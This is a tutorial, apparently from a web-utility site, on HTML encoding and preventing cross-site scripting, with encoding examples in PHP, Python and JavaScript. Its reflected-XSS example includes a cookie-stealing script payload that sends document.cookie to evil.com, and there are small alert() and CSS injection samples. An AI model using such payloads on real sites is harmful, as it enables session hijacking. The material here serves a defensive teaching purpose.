Learn how HTML encoding works, which characters need escaping, and how to prevent XSS vulnerabilities through proper encoding.
HTML encoding — also called HTML escaping or HTML entity encoding — is the process of converting characters that have special meaning in HTML into their corresponding HTML entity representations. This ensures the characters are treated as literal text content rather than HTML syntax.
For example, the less-than sign `<` is used in HTML to begin tags. If you want to display the literal text `<script>` on a web page without it being interpreted as an HTML tag, you must encode it as `&lt;script&gt;`.
HTML encoding is not just a formatting concern — it is a critical security measure that prevents Cross-Site Scripting (XSS) attacks, one of the most common and dangerous web vulnerabilities.
Five characters need to be escaped when untrusted text appears in HTML text content or attribute values:
| Character | Entity name | Numeric entity | When to escape |
|---|---|---|---|
| `<` | `&lt;` | `&#60;` | Always in text content and attribute values |
| `>` | `&gt;` | `&#62;` | In text content (technically optional but recommended) |
| `&` | `&amp;` | `&#38;` | Always; must be escaped first |
| `"` | `&quot;` | `&#34;` | In double-quoted attribute values |
| `'` | `&apos;` (HTML5) | `&#39;` | In single-quoted attribute values |
The ampersand `&` must be escaped before anything else, because it begins every entity. Suppose you escape `<` to `&lt;` first and then escape the `&` in the result to `&amp;`. You end up with `&amp;lt;` instead of `&lt;`, and the page shows the literal text `&lt;` rather than `<`. Always escape `&` first.
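To see why the order matters, here is a minimal Python sketch of a hand-rolled escaper built from chained `str.replace` calls. The names `escape_html` and `escape_html_wrong_order` are hypothetical and are used only for this illustration. In real code, prefer a library function such as Python's `html.escape`.

```python
# Replacements for the five special characters. "&" comes first so that
# the "&" inside entities produced by later replacements is not escaped again.
REPLACEMENTS = [
    ("&", "&amp;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ('"', "&quot;"),
    ("'", "&#39;"),
]


def escape_html(text: str) -> str:
    """Escape text by applying the replacements with '&' first."""
    for char, entity in REPLACEMENTS:
        text = text.replace(char, entity)
    return text


def escape_html_wrong_order(text: str) -> str:
    """Buggy variant: escapes '&' last, corrupting entities already produced."""
    for char, entity in REPLACEMENTS[1:] + REPLACEMENTS[:1]:
        text = text.replace(char, entity)
    return text


print(escape_html("a < b"))              # a &lt; b
print(escape_html_wrong_order("a < b"))  # a &amp;lt; b
```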
HTML defines more than 2,000 named character references. Here are some of the most commonly used:
| Character | Entity | Description |
|---|---|---|
| (non-breaking space) | `&nbsp;` | Non-breaking space; prevents a line break between words |
| — | `&mdash;` | Em dash |
| – | `&ndash;` | En dash |
| “ | `&ldquo;` | Left double quotation mark |
| ” | `&rdquo;` | Right double quotation mark |
| ‘ | `&lsquo;` | Left single quotation mark |
| ’ | `&rsquo;` | Right single quotation mark |
| … | `&hellip;` | Horizontal ellipsis |
| © | `&copy;` | Copyright sign |
| ® | `&reg;` | Registered trademark |
| ™ | `&trade;` | Trademark sign |
Mathematical and other symbols:

| Character | Entity | Description |
|---|---|---|
| × | `&times;` | Multiplication sign |
| ÷ | `&divide;` | Division sign |
| ± | `&plusmn;` | Plus-minus sign |
| ≠ | `&ne;` | Not equal to |
| ≤ | `&le;` | Less-than or equal to |
| ≥ | `&ge;` | Greater-than or equal to |
| ∞ | `&infin;` | Infinity |
| » | `&raquo;` | Right-pointing double angle quotation mark |
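You can check what a named reference decodes to with Python's standard library, which ships the HTML5 table of named character references as `html.entities.html5`. The short sketch below looks up a few of the names from the tables above. The exact size of the table depends on the Python version, so no count is asserted here.

```python
import html
from html.entities import html5

# Decode a few of the named references listed in the tables above.
for name in ["mdash", "copy", "times", "ne", "infin"]:
    char = html.unescape(f"&{name};")
    print(f"&{name};", "->", char, f"U+{ord(char):04X}")

# html5 maps reference names (with their trailing ";") to the characters.
print(len(html5))        # size of the table bundled with this Python version
print(html5["hellip;"])  # the ellipsis character, U+2026
```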
Cross-Site Scripting (XSS) is a class of attack where an attacker injects malicious scripts into web pages viewed by other users. HTML encoding is the primary defense.
Imagine a search page that displays the search query back to the user:
```php
<!-- Unsafe: directly inserting user input into HTML -->
<p>You searched for: <?= $_GET["q"] ?></p>
```
Suppose an attacker gets a victim to open a link whose `q` parameter decodes to `<script>document.location="https://evil.com/steal?c="+document.cookie</script>`. The server then outputs:

```html
<p>You searched for: <script>document.location="https://evil.com/steal?c="+document.cookie</script></p>
```

The victim's browser executes the script and sends their session cookie to the attacker. The exception is a cookie marked `HttpOnly`, which is hidden from JavaScript.
With HTML encoding:
```php
<!-- Safe: encoding the output -->
<p>You searched for: <?= htmlspecialchars($_GET["q"], ENT_QUOTES, "UTF-8") ?></p>
```
The output becomes:
```html
<p>You searched for: &lt;script&gt;document.location=&quot;https://evil.com/steal?c=&quot;+document.cookie&lt;/script&gt;</p>
```
This displays as literal text — harmless.
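For comparison, here is the same fix sketched in Python. The standard library's `html.escape` plays the role of `htmlspecialchars`. The function name `render_search_results` is hypothetical.

```python
from html import escape


def render_search_results(query: str) -> str:
    """Build the search-results snippet, escaping the untrusted query."""
    # quote=True (the default) also escapes " and ', like ENT_QUOTES in PHP.
    return f"<p>You searched for: {escape(query, quote=True)}</p>"


payload = '<script>document.location="https://evil.com/steal?c="+document.cookie</script>'
print(render_search_results(payload))
```

Python writes `'` as `&#x27;` rather than PHP's `&#039;`. Both are valid numeric references for the same character.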
Stored (persistent) XSS works the same way, except that the malicious input is saved (for example, in a comment on a blog post) and then served to every user who views the page. The same defense applies: HTML-encode all user-provided content before inserting it into HTML.
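A minimal sketch of the stored case follows. It uses an in-memory SQLite database with a hypothetical `comments` table in place of a real comment store. The raw input is stored unchanged and escaped only when it is rendered. This is one common design choice: the same stored text may later be needed in other contexts, such as JSON or URLs, each with its own encoding.

```python
import sqlite3
from html import escape

# In-memory database standing in for a real comment store (hypothetical schema).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE comments (author TEXT, body TEXT)")

# Store the raw input exactly as submitted; escaping happens on output.
db.execute(
    "INSERT INTO comments VALUES (?, ?)",
    ("mallory", "<img src=x onerror=alert(1)>"),
)


def render_comments(conn: sqlite3.Connection) -> str:
    """Render every stored comment, HTML-escaping each field at output time."""
    items = [
        f"<li><b>{escape(author)}</b>: {escape(body)}</li>"
        for author, body in conn.execute("SELECT author, body FROM comments")
    ]
    return "<ul>" + "".join(items) + "</ul>"


print(render_comments(db))
```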
HTML encoding is not one-size-fits-all. The correct encoding depends on where in the HTML document you are inserting data:
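In text content (between tags), escape `<`, `>`, and `&`:

```html
<p>User said: &lt;b&gt;Hello&lt;/b&gt;</p>
```

In attribute values, escape `<`, `>`, `&`, and the quote character that delimits the value, and always quote attribute values:

```html
<input value="&lt;script&gt;&amp;hello&lt;/script&gt;">
```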
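The difference between the two contexts is easy to demonstrate with Python's `html.escape`. Its `quote` flag controls whether `"` and `'` are escaped. The payload below is only an illustrative example.

```python
from html import escape

user_value = 'x" onfocus="alert(1)" autofocus="'

# quote=False escapes only &, < and >, which is enough for text content...
unsafe_attr = f'<input value="{escape(user_value, quote=False)}">'
# ...but inside a quoted attribute the unescaped " ends the value early.
print(unsafe_attr)

# quote=True also escapes " and ', so the value stays inside the attribute.
safe_attr = f'<input value="{escape(user_value, quote=True)}">'
print(safe_attr)
```

The first result contains a live `onfocus` handler. In the second, the payload stays inside `value` as inert text.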
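In JavaScript contexts, do NOT use HTML encoding for the data you insert. Use JSON encoding or a JavaScript-specific escaping function instead. HTML encoding does not prevent XSS here for two reasons. In event-handler attributes such as `onclick`, the browser decodes entities before running the code. Inside a `<script>` element, entities are not decoded at all, so the data also arrives corrupted.

```php
<!-- WRONG: HTML encoding in a JS context; the variable literally contains "&lt;script&gt;" -->
<script>var name = "&lt;script&gt;";</script>

<!-- RIGHT: JSON encoding for a JS context; the JSON_HEX_* flags also escape <, >, &, ' and " -->
<script>var name = <?= json_encode($name, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) ?>;</script>
```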
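Python's `json.dumps` does not escape `<`. On its own, it would let a `</script>` inside the data close the script element. Below is a minimal sketch that escapes `<`, `>` and `&` as JSON unicode escapes, similar in spirit to PHP's `JSON_HEX_TAG` and `JSON_HEX_AMP` flags. The helper name `json_for_script` is hypothetical.

```python
import json


def json_for_script(value) -> str:
    """Serialize value as a JavaScript literal for use inside <script>.

    json.dumps does not escape "<", so a string containing "</script>"
    could close the script element early. Replacing <, > and & with their
    JSON unicode escapes keeps the literal valid while hiding them from
    the HTML parser.
    """
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


name = "</script><script>alert(1)</script>"
print(f"<script>var name = {json_for_script(name)};</script>")
```

Because the escapes are valid in both JSON and JavaScript string literals, the script still sees the original string.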
In URLs, use URL percent-encoding, not HTML encoding, for values inserted as query parameters. Then HTML-encode the entire attribute value:

```php
<a href="https://example.com/search?q=<?= htmlspecialchars(urlencode($query)) ?>">Search</a>
```
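The same two-step approach in Python is sketched below. `urllib.parse.urlencode` percent-encodes the parameters, and `html.escape` then encodes the finished URL for the attribute. The `page` parameter is hypothetical. It is added only to show why the second step matters: the `&` separating parameters must become `&amp;` inside an HTML attribute.

```python
from html import escape
from urllib.parse import urlencode


def search_link(query: str) -> str:
    """Build a link whose href carries `query` as a URL parameter."""
    # Step 1: percent-encode the parameter values for the URL.
    # urlencode uses "+" for spaces, like PHP's urlencode.
    href = "https://example.com/search?" + urlencode({"q": query, "page": 2})
    # Step 2: HTML-encode the whole URL, since it sits inside an attribute;
    # this turns the "&" between parameters into "&amp;".
    return f'<a href="{escape(href)}">Search</a>'


print(search_link('cats & "dogs"'))
```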
In CSS, avoid inserting user data at all. If it is unavoidable, use CSS-specific escaping; HTML encoding is not sufficient.
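Below is a sketch of CSS-specific escaping. It assumes the value is placed inside a quoted CSS string. Every character other than an ASCII letter or digit is replaced with a CSS hex escape. The function name `css_escape` and the sample value are hypothetical. Validating against a strict allowlist (for example, a fixed set of font names) is usually the safer choice when you can use it.

```python
def css_escape(value: str) -> str:
    """Escape a string for use inside a quoted CSS string.

    Every character other than an ASCII letter or digit becomes a CSS hex
    escape: a backslash, the code point in hex, then a space that ends the
    escape (the space is consumed by the CSS parser, not rendered).
    """
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            out.append(f"\\{ord(ch):x} ")
    return "".join(out)


user_font = "Arial'; background: url(//evil.example); x: '"
print(f"<style>p {{ font-family: '{css_escape(user_font)}'; }}</style>")
```

Since `<` becomes `\3c `, the value also cannot close the `<style>` element.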
In PHP:

```php
<?php
// htmlspecialchars is the correct function for HTML context:
// with ENT_QUOTES it escapes &, <, >, " and '.
$safe = htmlspecialchars($userInput, ENT_QUOTES | ENT_HTML5, "UTF-8");

// htmlentities also converts every character that has a named entity
// (such as é and ©), which is overkill when the page is served as UTF-8.
$safe = htmlentities($userInput, ENT_QUOTES | ENT_HTML5, "UTF-8");
```
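Python's standard library has no direct equivalent of `htmlentities`. A rough analogue is sketched below: escape the HTML special characters, then use the `xmlcharrefreplace` codec error handler to turn every non-ASCII character into a numeric reference. Unlike `htmlentities`, this emits numeric rather than named references. The function name is hypothetical.

```python
from html import escape


def escape_all_non_ascii(text: str) -> str:
    """Escape HTML specials, then turn every non-ASCII character into a
    numeric character reference (a rough analogue of PHP's htmlentities)."""
    return escape(text).encode("ascii", "xmlcharrefreplace").decode("ascii")


print(escape("Café <b>"))                # Café &lt;b&gt;
print(escape_all_non_ascii("Café <b>"))  # Caf&#233; &lt;b&gt;
```

On a page served as UTF-8, the first form is enough, which is why the lighter function is usually the right choice.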
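In browser JavaScript:

```javascript
// Browser-only helper: the DOM serializer escapes &, < and > in text nodes.
// It does NOT escape quotes, so the result is safe for text content only,
// not for attribute values.
function escapeHtml(str) {
  const div = document.createElement("div")
  div.appendChild(document.createTextNode(str))
  return div.innerHTML
}

// Or set text content directly; the browser never parses it as HTML
// (element and userInput are placeholders for your own node and data):
element.textContent = userInput // Safe, no encoding needed
// element.innerHTML = userInput // UNSAFE: use textContent instead
```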
In Python, the standard-library `html` module handles both directions:

```python
from html import escape, unescape

safe = escape("<script>alert(1)</script>", quote=True)
print(safe)
# => &lt;script&gt;alert(1)&lt;/script&gt;

original = unescape("&lt;script&gt;alert(1)&lt;/script&gt;")
print(original)
# => <script>alert(1)</script>
```
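In Node.js, the third-party `he` library handles encoding and decoding:

```javascript
// Using the he library (npm install he)
const he = require("he")

// useNamedReferences: true emits &lt; and &gt; instead of the default
// hexadecimal references (&#x3C; and &#x3E;)
const encoded = he.encode("<script>alert(1)</script>", { useNamedReferences: true })
// => "&lt;script&gt;alert(1)&lt;/script&gt;"

const decoded = he.decode("&lt;script&gt;alert(1)&lt;/script&gt;")
// => "<script>alert(1)</script>"
```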
These three encodings are often confused:
| Encoding | Purpose | Example input | Example output |
|---|---|---|---|
| HTML encoding | Safely embed text in HTML | `<script>` | `&lt;script&gt;` |
| URL encoding | Safely embed data in URLs | `hello world` | `hello%20world` |
| Base64 | Encode binary data as text | The bytes of `Hello` | `SGVsbG8=` |
They serve completely different purposes and are not interchangeable. Using URL encoding where HTML encoding is needed (or vice versa) is a common mistake that can lead to either display corruption or security vulnerabilities.
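The three encodings are easy to compare side by side with Python's standard library. The sketch below uses the inputs from the table. The last line shows what "display corruption" means in practice: URL-encoding text that was meant for an HTML page leaves the reader looking at `%3Cscript%3E` instead of `<script>`.

```python
import base64
from html import escape
from urllib.parse import quote

print(escape("<script>"))                          # &lt;script&gt;
print(quote("hello world"))                        # hello%20world
print(base64.b64encode(b"Hello").decode("ascii"))  # SGVsbG8=

# Wrong encoding for the context: shown as literal text on an HTML page.
print(quote("<script>"))                           # %3Cscript%3E
```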
Most modern web frameworks and templating engines auto-escape HTML by default:
- React: JSX escapes values embedded with `{expression}` by default. Use `dangerouslySetInnerHTML` only for trusted HTML.
- Vue: `{{ expression }}` auto-escapes. Use `v-html` only for trusted HTML.
- Django: templates auto-escape by default. Use `{% autoescape off %}` or `|safe` only for trusted content.
- Jinja2: auto-escaping is on when the environment is created with `autoescape=True` (Flask enables it for `.html` templates). Use the `|safe` filter only for trusted content.
- Handlebars (and Mustache): `{{ expression }}` auto-escapes. Use `{{{ expression }}}` for raw HTML.

Auto-escaping dramatically reduces the risk of XSS, but you still need to understand the underlying mechanism. Every `dangerouslySetInnerHTML`, `v-html`, or `|safe` usage is a potential XSS vulnerability if it includes untrusted input.
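The mechanism behind auto-escaping with an opt-out marker can be sketched in a few lines. The class `SafeHtml` and the function `render` are hypothetical. They are loosely modeled on the idea behind MarkupSafe's `Markup` class, which Jinja2 uses for `|safe`, and are not any framework's actual API. Every value is escaped unless it has been explicitly marked as trusted.

```python
from html import escape


class SafeHtml(str):
    """Marks a string as trusted HTML that the renderer must not escape."""


def render(template: str, **values: object) -> str:
    """Fill {name} placeholders, escaping every value not marked SafeHtml."""
    filled = {
        key: value if isinstance(value, SafeHtml) else escape(str(value))
        for key, value in values.items()
    }
    return template.format(**filled)


page = "<p>{comment}</p><footer>{footer}</footer>"
out = render(
    page,
    comment="<script>alert(1)</script>",          # untrusted: escaped
    footer=SafeHtml("<em>&copy; Example</em>"),  # trusted: inserted as-is
)
print(out)
```

The risk described above is visible here. Wrapping untrusted input in `SafeHtml` would bypass the escaping entirely, just as `|safe` or `v-html` does.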
Whether you need to safely embed user content in HTML, decode an HTML-encoded string you received from an API, or debug XSS protections, the HTML Encoder and Decoder on utils.live handle it instantly in your browser.